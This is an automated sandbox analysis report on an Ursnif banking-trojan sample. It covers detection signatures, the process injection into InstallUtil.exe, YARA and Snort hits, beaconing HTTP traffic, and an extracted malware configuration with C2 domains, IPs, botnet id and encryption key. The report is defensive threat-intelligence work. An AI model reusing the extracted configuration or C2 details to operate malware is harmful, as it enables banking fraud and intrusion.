
Windows Analysis Report
OojqjHGE0W.exe

Overview

General Information

Sample Name: OojqjHGE0W.exe
Analysis ID: 630152
MD5: 4ed3fa33609a51baf209a5954bef6633
SHA1: aff82f0554f18c780561d6b8b1ca5a1001e42512
SHA256: 988177454fe3a5ba8fcdf7f3124e2c56f312b776542d3763540c254df6fe6f76
Tags: exe, signed

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
Snort IDS alert for network traffic
Writes to foreign memory regions
Writes or reads registry keys via WMI
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Found API chain indicative of debugger detection
Machine Learning detection for sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
PE file contains strange resources
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
PE / OLE file has an invalid certificate
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • OojqjHGE0W.exe (PID: 3408 cmdline: "C:\Users\user\Desktop\OojqjHGE0W.exe" MD5: 4ED3FA33609A51BAF209A5954BEF6633)
    • InstallUtil.exe (PID: 5584 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe MD5: EFEC8C379D165E3F33B536739AEE26A3)
  • cleanup
{"RSA Public Key": "S0cXgkczLn8DzpFkqJkBMx5geC7yniHR4ECyGeVYDO5jsqYVdXE2v679nj0L+4Im3j/P6z1P+Yt1BRosNI7Edvd1U5N0OYNwNVRfWwfbhm6jaX9Kjt9vEFS5dCsKX71jt2XzO+H4zoaN0nbuxJko5Np4J7p0zDkJiLw6HxWp4zGiWIwT2o7vLE3guRMwyRVXO9dkUDWYMn+gWBAKovUuxnaDZD7PIJ/H8zTx3Yz7628+O4pRw2KlIh0/fkIzdLb08ciTd+kW2cM+z/W40SWfyGxExAOJ7AMei6jzcKc68f1Bamsf4QGIbKQz9UqHR5cBlCKpLVi3hYeembcW9ep7oVhTb5Y2TC0ZAzzb/feTdhI=", "c2_domain": ["anm.msn.com", "194.76.225.45", "msi.msn.com", "194.76.225.56"], "botnet": "1700", "server": "50", "serpent_key": "1OoXFPbINCQ6HCAa", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Yara matches (Source / Rule / Description / Author / Strings):
Source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp  Rule: JoeSecurity_Ursnif  Description: Yara detected Ursnif  Author: Joe Security
Source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp  Rule: JoeSecurity_Ursnif  Description: Yara detected Ursnif  Author: Joe Security
Source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp  Rule: JoeSecurity_Ursnif  Description: Yara detected Ursnif  Author: Joe Security
Source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp  Rule: JoeSecurity_Ursnif  Description: Yara detected Ursnif  Author: Joe Security
Source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp  Rule: JoeSecurity_Ursnif  Description: Yara detected Ursnif  Author: Joe Security
(7 further entries not shown)

Yara matches (Source / Rule / Description / Author / Strings):
Source: 10.2.InstallUtil.exe.1b694a0.2.unpack  Rule: JoeSecurity_Ursnif_1  Description: Yara detected Ursnif  Author: Joe Security
Source: 10.2.InstallUtil.exe.1340000.1.unpack  Rule: JoeSecurity_Ursnif_1  Description: Yara detected Ursnif  Author: Joe Security
Source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpack  Rule: JoeSecurity_Ursnif_1  Description: Yara detected Ursnif  Author: Joe Security
No Sigma rule has matched

Snort IDS alert
Timestamp: 05/19/22-14:41:40.292996
Source IP: 192.168.2.3
Destination IP: 52.169.118.173
SID: 2033203
Source Port: 49702
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Snort IDS alert
Timestamp: 05/19/22-14:41:40.292996
Source IP: 192.168.2.3
Destination IP: 52.169.118.173
SID: 2033204
Source Port: 49702
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected


                  AV Detection

                  Source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpackMalware Configuration Extractor: Ursnif {"RSA Public Key": "S0cXgkczLn8DzpFkqJkBMx5geC7yniHR4ECyGeVYDO5jsqYVdXE2v679nj0L+4Im3j/P6z1P+Yt1BRosNI7Edvd1U5N0OYNwNVRfWwfbhm6jaX9Kjt9vEFS5dCsKX71jt2XzO+H4zoaN0nbuxJko5Np4J7p0zDkJiLw6HxWp4zGiWIwT2o7vLE3guRMwyRVXO9dkUDWYMn+gWBAKovUuxnaDZD7PIJ/H8zTx3Yz7628+O4pRw2KlIh0/fkIzdLb08ciTd+kW2cM+z/W40SWfyGxExAOJ7AMei6jzcKc68f1Bamsf4QGIbKQz9UqHR5cBlCKpLVi3hYeembcW9ep7oVhTb5Y2TC0ZAzzb/feTdhI=", "c2_domain": ["anm.msn.com", "194.76.225.45", "msi.msn.com", "194.76.225.56"], "botnet": "1700", "server": "50", "serpent_key": "1OoXFPbINCQ6HCAa", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: OojqjHGE0W.exe, ReversingLabs: Detection: 46%
Source: OojqjHGE0W.exe, Joe Sandbox ML: detected
Source: 10.2.InstallUtil.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.2.OojqjHGE0W.exe.8b5230.0.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 10.0.InstallUtil.exe.400000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 10.0.InstallUtil.exe.400000.1.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.3.OojqjHGE0W.exe.2580000.0.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: 0.3.OojqjHGE0W.exe.8b5230.2.unpack, Avira: Label: TR/Patched.Ren.Gen
Source: 0.3.OojqjHGE0W.exe.2580000.1.unpack, Avira: Label: TR/Crypt.XPACK.Gen7
Source: OojqjHGE0W.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: OojqjHGE0W.exe, Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdb source: OojqjHGE0W.exe
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdbP; source: OojqjHGE0W.exe, 00000000.00000000.267737292.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, OojqjHGE0W.exe, 00000000.00000002.478000343.0000000000B21000.00000020.00000001.01000000.00000003.sdmp
                  Source: Binary string: C:\Wotagebe poqu viquowe\Hosayem\Cajap\Viseti.pdbP;Q source: OojqjHGE0W.exe

                  Networking

Source: Traffic, Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49702 -> 52.169.118.173:80
Source: Traffic, Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49702 -> 52.169.118.173:80
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Connection: Keep-Alive
  Cache-Control: no-cache
  Host: www.msn.com
Source: global traffic, HTTP traffic detected:
  GET /de-ch/ HTTP/1.1
  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
  Connection: Keep-Alive
  Cache-Control: no-cache
  Host: www.msn.com
  Cookie: PreferencesMsn=eyJIb21lUGFnZSI6eyJTdHJpcGVzIjpbXSwiTWVTdHJpcGVNb2R1bGVzIjpbXSwiTWFya2V0Q29uZmlndXJhdGlvbiI6eyJNYXJrZXQiOiJkZS1jaCIsIlN1cHByZXNzUHJvbXB0IjpmYWxzZSwiUHJlZmVycmVkTGFuZ3VhZ2VDb2RlIjoiZGUtZGUiLCJDb3VudHJ5Q29kZSI6IkNIIn19LCJFeHBpcnlUaW1lIjo2MzgyMDA5NjkwMDQ5NzI5NzksIlZlcnNpb24iOjF90; marketPref=de-ch
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: <link rel="preconnect" href="img-s-msn-com.akamaized.net" /><link rel="preconnect" href="c.msn.com" /><link rel="preconnect" href="c.msn.cn" /><link rel="preconnect" href="http://www.bing.com" /><link rel="preconnect" href="//browser.events.data.msn.com" /><link rel="dns-prefetch" href="img-s-msn-com.akamaized.net" /><link rel="dns-prefetch" href="c.msn.com" /><link rel="dns-prefetch" href="c.msn.cn" /><link rel="dns-prefetch" href="http://www.bing.com" /><link rel="dns-prefetch" href="//browser.events.data.msn.com" /><link rel="canonical" href="http://www.msn.com/de-ch/" /> <title>MSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365</title> equals www.hotmail.com (Hotmail)
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns#
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ogp.me/ns/fb#
                  Source: OojqjHGE0W.exeString found in binary or memory: http://s.symcb.com/universal-root.crl0
                  Source: OojqjHGE0W.exeString found in binary or memory: http://s.symcd.com06
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/d7cb56b9-/direction=ltr.l
                  Source: InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/d7cb56b9-/direction=ltr.lo
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/519670.jpg
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAXt9ve.img?h=368&amp;w
                  Source: OojqjHGE0W.exeString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                  Source: OojqjHGE0W.exeString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                  Source: OojqjHGE0W.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/de-ch/
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://browser.events.data.msn.com/OneCollector/1.0/t.js?qsp=true&amp;anoncknm=%22%22&amp;name=%22M
                  Source: InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.hoergeraete.hoeren-heute.ch/horizon_reveal/?act=ACT0000040013ACT&amp;utm_source=mcrs&amp
                  Source: OojqjHGE0W.exeString found in binary or memory: https://d.symcb.com/cps0%
                  Source: OojqjHGE0W.exeString found in binary or memory: https://d.symcb.com/rpa0
                  Source: OojqjHGE0W.exeString found in binary or memory: https://d.symcb.com/rpa0.
                  Source: InstallUtil.exe, 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58b8&amp;bhid=62470ee6adad76040858398f&a
                  Source: InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://i.geistm.com/l/HFCH_DTS_LP?bcid=61c4707a19d27603f32a58ba&amp;bhid=6203eb0e7db0ad17f44b22d8&a
                  Source: InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1652964100&amp;rver=7.0.6730.0&am
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/logout.srf?ct=1652964101&amp;rver=7.0.6730.0&amp;lc=1033&amp;id=1184&amp;lru=
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/me.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1652964100&amp;rver=7.0.6730.0&amp;w
                  Source: InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mem.gfx.ms/meversion/?partner=msn&amp;market=de-ch&quot;
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://outlook.com/
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/autofahrer-38-rast-mit-94-km-h-durch-30er-zone/ar-AAXsnwd?ocid=
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/fremdes-b%c3%bcsi-gef%c3%bcttert-frau-soll-1250-franken-strafe-
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/olivia-und-noah-sind-die-beliebtesten-baby-vornamen-in-z%c3%bcr
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/polizei-nimmt-baukran-kletterer-fest/ar-AAXq550?ocid=hplocalnew
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/stadtrat-handelt-in-z%c3%bcrich-west-mehr-preisg%c3%bcnstige-wo
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/weniger-verbindungen-zwischen-z%c3%bcrich-und-bern-daf%c3%bcr-m
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/news/other/z%c3%bcrcher-kantonsrat-pr%c3%bcft-nach-igelkot-vorfall-sicherh
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/shopping
                  Source: InstallUtil.exe, 0000000A.00000002.535230526.0000000004300000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535290243.0000000004396000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504725612.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.535347560.0000000004400000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000003.504892855.0000000002049000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/sport/other/der-fcz-verabschiedet-sich-von-doumbia-und-ceesay/ar-AAXsezM?o
Source: unknown, DNS traffic detected: queries for: anm.msn.com

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match, file source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: InstallUtil.exe PID: 5584, type: MEMORYSTR
Source: Yara match, file source: 10.2.InstallUtil.exe.1b694a0.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.InstallUtil.exe.1340000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  E-Banking Fraud

Source: Yara match, file source: 0000000A.00000003.504942023.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501961576.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.502032730.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000002.535140555.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501571456.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501753987.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501977722.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501825234.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501701977.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 0000000A.00000003.501914236.00000000020C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: InstallUtil.exe PID: 5584, type: MEMORYSTR
Source: Yara match, file source: 10.2.InstallUtil.exe.1b694a0.2.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.InstallUtil.exe.1340000.1.unpack, type: UNPACKEDPE
Source: Yara match, file source: 10.2.InstallUtil.exe.1b694a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 0000000A.00000002.535054926.0000000001B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                  System Summary

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
